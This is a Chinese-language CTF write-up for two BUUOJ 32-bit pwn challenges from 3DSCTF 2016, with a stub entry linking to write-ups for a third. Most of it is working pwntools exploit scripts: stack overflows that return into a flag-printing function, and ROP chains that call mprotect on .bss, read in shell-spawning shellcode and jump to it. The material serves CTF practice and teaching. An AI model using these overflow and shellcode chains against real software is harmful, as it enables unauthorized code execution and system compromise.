1、get_started_3dsctf_2016
比较常规的解法:
由于这题没有关闭 stdout 的缓冲(没有 setbuf(stdout,0) / setvbuf 之类的调用),而 stdout 接到管道或 socket 时是全缓冲的,所以 get_flag 打印出来的内容会先停留在服务端进程的 stdio 缓冲区里;换句话说:如果程序不是正常退出而是崩溃(比如返回到非法地址触发 SIGSEGV),缓冲区不会被刷新,本题就不会回显 flag。好在本题提供了 exit() 函数,exit() 退出前会刷新 stdio 缓冲区,因此在 ROP 链中调用 get_flag 之后把返回地址接到 exit() 上,就可以看到 flag 了。
参考:
buuoj get_started_3dsctf_2016 WriteUp - CSULuyao - 博客园
from pwn import *
import sys
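def dbg(p, gdbscript=""):
    """Attach gdb to a local pwntools tube and wait before continuing.

    Args:
        p: the tube returned by process(); only meaningful for a local run.
        gdbscript: optional gdb commands (breakpoints, etc.) executed on
            attach. Defaults to none, so existing ``dbg(p)`` calls behave
            exactly as before.

    pause() blocks until Enter is pressed, giving time to set breakpoints
    before the payload is sent.
    """
    gdb.attach(p, gdbscript=gdbscript)
    pause()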
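# Target selection: `python3 exp.py l` runs the binary locally under gdb,
# anything else (including no argument) goes to the remote instance.  The
# original indexed sys.argv[1] unconditionally and died with IndexError when
# run without an argument.
if len(sys.argv) > 1 and sys.argv[1] == 'l':
    p = process("./get_started_3dsctf_2016")
    dbg(p)
else:
    # BUUOJ assigns a port per spawned instance; update it before use.
    p = remote("node4.buuoj.cn", 29821)
elf = ELF("./get_started_3dsctf_2016")

backdoor_addr = 0x80489A0  # get_flag (per the write-up): prints the flag when its two args match
offset = 0x38              # bytes from the start of the overflowed buffer to the saved return address
a1 = 814536271             # 0x308CD64F, first argument checked by the backdoor
a2 = 425138641             # 0x195719D1, second argument checked by the backdoor

# 32-bit cdecl frame as the backdoor sees it once we "return" into it:
#   [backdoor_addr][return address = exit][arg1][arg2]
# Returning into exit() instead of letting the process crash is essential:
# stdout is fully buffered here (it is a pipe/socket and nothing turns the
# buffering off), so the flag sits in the stdio buffer until exit() flushes
# it; a SIGSEGV on the way out would discard it.
# The payload must be bytes: p32() returns bytes, and prefixing it with a str
# raises TypeError on Python 3.
payload = b"a" * offset + p32(backdoor_addr) + p32(elf.sym["exit"]) + p32(a1) + p32(a2)
p.sendline(payload)
p.interactive()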
不常规的解法:
from pwn import *
import sys
# Log every byte in both directions; drop back to "info" once the chain works.
context.log_level = "debug"
# https://blog.csdn.net/mcmuyanga/article/details/108274091
# 肯定有人疑问为什么是 0x80EB000 而不是 bss 段的开头 0x80EBF80:
# mprotect 要求起始地址 addr 必须是页(4K)边界,否则直接返回 EINVAL,
# 所以这里把 bss 地址向下对齐到它所在页的起始地址(elf.bss() & ~0xfff);
# 长度按页考虑即可,Linux 内核会把 len 向上取整到页边界。
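def dbg(p, gdbscript=""):
    """Attach gdb to a local pwntools tube and wait before continuing.

    Args:
        p: the tube returned by process(); only meaningful for a local run.
        gdbscript: optional gdb commands (breakpoints, etc.) executed on
            attach. Defaults to none, so existing ``dbg(p)`` calls behave
            exactly as before.

    pause() blocks until Enter is pressed, giving time to set breakpoints
    before the payload is sent.
    """
    gdb.attach(p, gdbscript=gdbscript)
    pause()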
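# `python3 exp.py l` runs locally under gdb; otherwise connect to the remote.
# Guarding the argv index avoids an IndexError when no argument is given.
if len(sys.argv) > 1 and sys.argv[1] == 'l':
    p = process("./get_started_3dsctf_2016")
    dbg(p)
else:
    # BUUOJ assigns a port per spawned instance; update it before use.
    p = remote("node4.buuoj.cn", 29821)
elf = ELF("./get_started_3dsctf_2016")
# Make asm()/shellcraft target the binary's own arch/bits rather than the
# pwntools default.
context.binary = elf

mprotect_addr = elf.sym["mprotect"]  # static binary: libc symbols resolve from the ELF itself
read_addr = elf.sym["read"]
offset = 0x38                        # bytes from the overflowed buffer to the saved return address
pop_3_ret = 0x080509a5               # pop;pop;pop;ret — discards the three cdecl args of the previous call

# mprotect() needs a page-aligned start, so round .bss down to the page that
# contains it. The kernel rounds the length up to a page anyway, so ask for a
# whole page explicitly.
page_size = 0x1000
shellcode_addr = elf.bss() & ~(page_size - 1)
# NOTE(review): shellcode_addr is the *start* of that page, which likely also
# holds .data; the read() below overwrites whatever lives there. That is what
# the original did and it worked, but confirm nothing needed later is clobbered.
shellcode_len = 0x100

# ROP chain (32-bit cdecl: args sit on the stack right after the return slot):
#   mprotect(shellcode_addr, page_size, PROT_READ|PROT_WRITE|PROT_EXEC)
#   read(0, shellcode_addr, shellcode_len)
#   jump to shellcode_addr
# Each call "returns" into pop_3_ret, which skips its three arguments so the
# next gadget is reached.  bytes, not str: p32() returns bytes.
payload = b"a" * offset
payload += p32(mprotect_addr) + p32(pop_3_ret) + p32(shellcode_addr) + p32(page_size) + p32(0x7)
payload += p32(read_addr) + p32(pop_3_ret) + p32(0) + p32(shellcode_addr) + p32(shellcode_len)
payload += p32(shellcode_addr)

shellcode = asm(shellcraft.sh())
if len(shellcode) > shellcode_len:
    raise ValueError("shellcode does not fit in the read() buffer")

p.sendline(payload)
# NOTE(review): if the overflowing read goes through stdio, the next line can
# be slurped into the stdio buffer before the raw read() runs and the chain
# hangs; a short sleep() between the two sends avoids that — confirm against
# the binary.
p.sendline(shellcode)
p.interactive()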
2、not_the_same_3dsctf_2016
同类型的一道题(payload 同样要以 exit() 收尾来刷新输出),常规解法:
from pwn import *
import sys
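def dbg(p, gdbscript=""):
    """Attach gdb to a local pwntools tube and wait before continuing.

    Args:
        p: the tube returned by process(); only meaningful for a local run.
        gdbscript: optional gdb commands (breakpoints, etc.) executed on
            attach. Defaults to none, so existing ``dbg(p)`` calls behave
            exactly as before.

    pause() blocks until Enter is pressed, giving time to set breakpoints
    before the payload is sent.
    """
    gdb.attach(p, gdbscript=gdbscript)
    pause()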
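# `python3 exp.py l` runs locally under gdb; otherwise connect to the remote.
# Guarding the argv index avoids an IndexError when no argument is given.
if len(sys.argv) > 1 and sys.argv[1] == 'l':
    p = process("./not_the_same_3dsctf_2016")
    dbg(p)
else:
    # BUUOJ assigns a port per spawned instance; update it before use.
    p = remote("node4.buuoj.cn", 25817)
elf = ELF("./not_the_same_3dsctf_2016")

offset = 45               # bytes from the overflowed buffer to the saved return address
get_secret = 0x080489A0   # per the write-up: fills the secret buffer (not re-verified here)
printf_addr = 0x0804F0A0  # printf in this static binary (elf.sym["printf"] should agree)
flag_addr = 0x080ECA2D    # buffer printf is asked to print (the secret, per the write-up)

# Chain (32-bit cdecl):
#   get_secret()        -> returns into printf
#   printf(flag_addr)   -> returns into exit
#   exit(flag_addr)     -> flushes stdio so the printed secret actually reaches us
# printf's only argument doubles as exit's status argument; exit keeps just its
# low byte, which is harmless.
# NOTE(review): the secret is passed to printf as the *format string*, so a
# '%' inside it would be interpreted. Fine for a CTF flag, worth knowing.
# bytes, not str: p32() returns bytes and str + bytes raises on Python 3.
payload = (b"a" * offset + p32(get_secret) + p32(printf_addr)
           + p32(elf.sym["exit"]) + p32(flag_addr))
p.sendline(payload)
p.interactive()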
不常规解法
from pwn import *
import sys
# Log every byte in both directions; drop back to "info" once the chain works.
context.log_level = "debug"
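def dbg(p, gdbscript=""):
    """Attach gdb to a local pwntools tube and wait before continuing.

    Args:
        p: the tube returned by process(); only meaningful for a local run.
        gdbscript: optional gdb commands (breakpoints, etc.) executed on
            attach. Defaults to none, so existing ``dbg(p)`` calls behave
            exactly as before.

    pause() blocks until Enter is pressed, giving time to set breakpoints
    before the payload is sent.
    """
    gdb.attach(p, gdbscript=gdbscript)
    pause()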
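# `python3 exp.py l` runs locally under gdb; otherwise connect to the remote.
# Guarding the argv index avoids an IndexError when no argument is given.
if len(sys.argv) > 1 and sys.argv[1] == 'l':
    p = process("./not_the_same_3dsctf_2016")
    dbg(p)
else:
    # NOTE(review): the conventional script for this same binary above uses
    # port 25817; BUUOJ assigns a port per spawned instance, so set whichever
    # your instance reports.
    p = remote("node4.buuoj.cn", 29821)
elf = ELF("./not_the_same_3dsctf_2016")
# Make asm()/shellcraft target the binary's own arch/bits rather than the
# pwntools default.
context.binary = elf

mprotect_addr = elf.sym["mprotect"]  # static binary: libc symbols resolve from the ELF itself
read_addr = elf.sym["read"]
offset = 45                          # bytes from the overflowed buffer to the saved return address
pop_3_ret = 0x080494db               # pop;pop;pop;ret — discards the three cdecl args of the previous call

# mprotect() needs a page-aligned start, so round .bss down to the page that
# contains it. The kernel rounds the length up to a page anyway, so ask for a
# whole page explicitly.
page_size = 0x1000
shellcode_addr = elf.bss() & ~(page_size - 1)
# NOTE(review): shellcode_addr is the *start* of that page, which likely also
# holds .data; the read() below overwrites whatever lives there. That is what
# the original did and it worked, but confirm nothing needed later is clobbered.
shellcode_len = 0x100

# ROP chain (32-bit cdecl: args sit on the stack right after the return slot):
#   mprotect(shellcode_addr, page_size, PROT_READ|PROT_WRITE|PROT_EXEC)
#   read(0, shellcode_addr, shellcode_len)
#   jump to shellcode_addr
# Each call "returns" into pop_3_ret, which skips its three arguments so the
# next gadget is reached.  bytes, not str: p32() returns bytes.
payload = b"a" * offset
payload += p32(mprotect_addr) + p32(pop_3_ret) + p32(shellcode_addr) + p32(page_size) + p32(0x7)
payload += p32(read_addr) + p32(pop_3_ret) + p32(0) + p32(shellcode_addr) + p32(shellcode_len)
payload += p32(shellcode_addr)

shellcode = asm(shellcraft.sh())
if len(shellcode) > shellcode_len:
    raise ValueError("shellcode does not fit in the read() buffer")

p.sendline(payload)
# NOTE(review): if the overflowing read goes through stdio, the next line can
# be slurped into the stdio buffer before the raw read() runs and the chain
# hangs; a short sleep() between the two sends avoids that — confirm against
# the binary.
p.sendline(shellcode)
p.interactive()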
3、极客大挑战的pwn222
没找到题目文件。写这道题是因为它的解法和前面那道 checkin 差不多,拿来巩固一下;下面给几个 WP 链接:
magic gadget | DaiDai's blog
极客大挑战pwn - EDS